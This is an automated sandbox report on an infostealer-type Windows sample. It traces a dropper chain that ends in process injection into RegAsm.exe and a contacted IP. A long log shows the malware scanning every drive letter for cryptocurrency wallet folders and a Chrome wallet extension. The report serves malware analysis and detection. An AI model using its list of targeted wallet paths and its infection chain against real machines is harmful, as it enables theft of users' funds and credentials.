Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe Queries volume information: C:\Users\user\AppData\Local\asm\COMSurrogate.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\SysWOW64\curl.exe Queries volume information: C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip VolumeInformation
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr Code function: 18_2_00670030 GetLocalTime,__swprintf, 18_2_00670030
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr Code function: 18_2_00670722 GetUserNameW, 18_2_00670722
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr Code function: 18_2_0066416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 18_2_0066416A
Source: C:\Users\user\Desktop\DM6vAAgoCw.exe Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406831
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: C:\Windows\SysWOW64\xcopy.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT
Source: C:\Windows\SysWOW64\xcopy.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG
Source: C:\Windows\SysWOW64\xcopy.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOCK
Source: C:\Windows\SysWOW64\xcopy.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log
Source: C:\Windows\SysWOW64\xcopy.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001
Source: C:\Windows\SysWOW64\xcopy.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Electrum\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Roaming\Namecoin\
Source: C:\Windows\SysWOW64\cmd.exe File opened: D:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
Source: C:\Windows\SysWOW64\cmd.exe File opened: D:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\SysWOW64\cmd.exe File opened: D:\Users\user\AppData\Roaming\Electrum\
Source: C:\Windows\SysWOW64\cmd.exe File opened: D:\Users\user\AppData\Roaming\atomic\Local Storage\
Source: C:\Windows\SysWOW64\cmd.exe File opened: D:\Users\user\AppData\Roaming\Guarda\Local Storage\
Source: C:\Windows\SysWOW64\cmd.exe File opened: D:\Users\user\AppData\Roaming\Namecoin\
Source: C:\Windows\SysWOW64\cmd.exe File opened: E:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
Source: C:\Windows\SysWOW64\cmd.exe File opened: E:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\SysWOW64\cmd.exe File opened: E:\Users\user\AppData\Roaming\Electrum\
Source: C:\Windows\SysWOW64\cmd.exe File opened: E:\Users\user\AppData\Roaming\atomic\Local Storage\
Source: C:\Windows\SysWOW64\cmd.exe File opened: E:\Users\user\AppData\Roaming\Guarda\Local Storage\
Source: C:\Windows\SysWOW64\cmd.exe File opened: E:\Users\user\AppData\Roaming\Namecoin\
Source: C:\Windows\SysWOW64\cmd.exe File opened: F:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
Source: C:\Windows\SysWOW64\cmd.exe File opened: F:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\SysWOW64\cmd.exe File opened: F:\Users\user\AppData\Roaming\Electrum\
Source: C:\Windows\SysWOW64\cmd.exe File opened: F:\Users\user\AppData\Roaming\atomic\Local Storage\
Source: C:\Windows\SysWOW64\cmd.exe File opened: F:\Users\user\AppData\Roaming\Guarda\Local Storage\
Source: C:\Windows\SysWOW64\cmd.exe File opened: F:\Users\user\AppData\Roaming\Namecoin\
Source: C:\Windows\SysWOW64\cmd.exe File opened: G:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
Source: C:\Windows\SysWOW64\cmd.exe File opened: G:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\SysWOW64\cmd.exe File opened: G:\Users\user\AppData\Roaming\Electrum\
Source: C:\Windows\SysWOW64\cmd.exe File opened: G:\Users\user\AppData\Roaming\atomic\Local Storage\
Source: C:\Windows\SysWOW64\cmd.exe File opened: G:\Users\user\AppData\Roaming\Guarda\Local Storage\
Source: C:\Windows\SysWOW64\cmd.exe File opened: G:\Users\user\AppData\Roaming\Namecoin\
Source: C:\Windows\SysWOW64\cmd.exe File opened: H:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
Source: C:\Windows\SysWOW64\cmd.exe File opened: H:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\SysWOW64\cmd.exe File opened: H:\Users\user\AppData\Roaming\Electrum\
Source: C:\Windows\SysWOW64\cmd.exe File opened: H:\Users\user\AppData\Roaming\atomic\Local Storage\
Source: C:\Windows\SysWOW64\cmd.exe File opened: H:\Users\user\AppData\Roaming\Guarda\Local Storage\
Source: C:\Windows\SysWOW64\cmd.exe File opened: H:\Users\user\AppData\Roaming\Namecoin\
Source: C:\Windows\SysWOW64\cmd.exe File opened: I:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
Source: C:\Windows\SysWOW64\cmd.exe File opened: I:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\SysWOW64\cmd.exe File opened: I:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: I:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: I:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: I:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: J:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: J:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: J:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: J:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: J:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: J:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: K:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: K:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: K:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: K:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: K:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: K:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: L:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: L:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: L:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: L:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: L:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: L:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: M:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: M:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: M:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: M:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: M:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: M:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: N:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: N:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: N:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: N:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: N:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: N:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: O:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: O:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: O:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: O:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: O:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: O:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: P:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: P:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: P:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: P:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: P:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: P:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Q:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Q:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Q:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Q:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Q:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Q:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: R:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: R:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: R:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: R:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: R:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: R:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: S:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: S:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: S:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: S:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: S:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: S:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: T:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: T:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: T:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: T:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: T:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: T:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: U:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: U:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: U:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: U:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: U:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: U:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: V:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: V:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: V:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: V:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: V:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: V:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: W:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: W:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: W:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: W:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: W:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: W:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: X:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: X:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: X:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: X:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: X:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: X:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Y:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Y:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Y:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Y:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Y:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Y:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Z:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Z:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Z:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Z:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Z:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Z:\Users\user\AppData\Roaming\Namecoin\
Source: ApolloPro.scr | Binary or memory string: WIN_81
Source: ApolloPro.scr | Binary or memory string: WIN_XP
Source: ApolloPro.scr | Binary or memory string: WIN_XPe
Source: ApolloPro.scr | Binary or memory string: WIN_VISTA
Source: ApolloPro.scr | Binary or memory string: WIN_7
Source: ApolloPro.scr | Binary or memory string: WIN_8
Source: ApolloPro.scr, 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: Yara match | File source: 0000002B.00000002.3921696825.000000000050E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000002.3922955190.0000000002820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.3949785259.0000000003090000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000002.3922955190.000000000282E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000002.3921696825.0000000000500000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.3949654708.0000000002E10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000002.3923072888.00000000029F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000002.3921605564.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000034.00000002.3988717578.00000000030E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.3949588904.0000000002C90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000034.00000002.3987839867.0000000002C40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000034.00000003.3987493910.0000000002CD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000034.00000002.3987947915.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000030.00000002.3949654708.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000002.3922851056.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000034.00000002.3988039923.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002B.00000002.3921957521.0000000002940000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\downloaded_script.bat, type: DROPPED
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_006A696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 18_2_006A696E
Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr | Code function: 18_2_006A6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 18_2_006A6E32
MITRE ATT&CK Matrix (the 14 tactic columns of the matrix, one per line, listing the techniques shown in each column; the bracketed figure in front of a technique is the count badge the matrix displays for it)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: [211] Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: [2] Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: [11] Windows Management Instrumentation; [2] Native API; [11] Scheduled Task/Job; [2] PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: [211] Scripting; [1] DLL Side-Loading; [2] Valid Accounts; [1] Windows Service; [11] Scheduled Task/Job; [11] Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: [1] Exploitation for Privilege Escalation; [1] DLL Side-Loading; [2] Valid Accounts; [21] Access Token Manipulation; [1] Windows Service; [212] Process Injection; [11] Scheduled Task/Job; [11] Registry Run Keys / Startup Folder; At; Cron; Launchd
Defense Evasion: [111] Disable or Modify Tools; [11] Deobfuscate/Decode Files or Information; [31] Obfuscated Files or Information; [12] Software Packing; [1] Timestomp; [1] DLL Side-Loading; [121] Masquerading; [2] Valid Accounts; [51] Virtualization/Sandbox Evasion; [21] Access Token Manipulation; [212] Process Injection
Credential Access: [1] OS Credential Dumping; [21] Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: [2] System Time Discovery; [1] Account Discovery; [3] File and Directory Discovery; [27] System Information Discovery; [241] Security Software Discovery; [51] Virtualization/Sandbox Evasion; [4] Process Discovery; [11] Application Window Discovery; [1] System Owner/User Discovery; Network Service Discovery; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: [11] Archive Collected Data; [2] Data from Local System; [21] Input Capture; [4] Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: [1] Ingress Tool Transfer; [1] Encrypted Channel; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: [1] System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
Behavior Graph ID: 1569756
Sample: DM6vAAgoCw.exe
Startdate: 06/12/2024
Architecture: WINDOWS
Score: 100

Signatures attached to the sample node:
• Found malware configuration
• Malicious sample detected (through community Yara rule)
• Antivirus detection for URL or domain
• 25 other signatures

Process tree (under each process: its dropped files, signatures and contacted hosts, then its child processes; the number after a process name is the count displayed next to it in the graph):

• DM6vAAgoCw.exe 21
    • dropped: C:\Users\user\AppData\Local\...\Commissioner, PE32
    • dropped: C:\Users\user\AppData\Local\Temp\Artistic, DOS
    • cmd.exe 3
        • dropped: C:\Users\user\AppData\Local\Temp\...\Dr.com, PE32
        • Suspicious powershell command line found
        • Tries to download and execute files (via powershell)
        • Drops PE files with a suspicious file extension
        • 2 other signatures
        • Dr.com 5
            • dropped: C:\Users\user\AppData\Local\...\ApolloPro.scr, PE32
            • dropped: C:\Users\user\AppData\Local\...\ApolloPro.js, ASCII
            • dropped: C:\Users\user\AppData\Local\...\RegAsm.exe, PE32
            • Drops PE files with a suspicious file extension
            • Writes to foreign memory regions
            • Injects a PE file into a foreign processes
            • RegAsm.exe 18
                • 45.74.38.211 M247GB United States
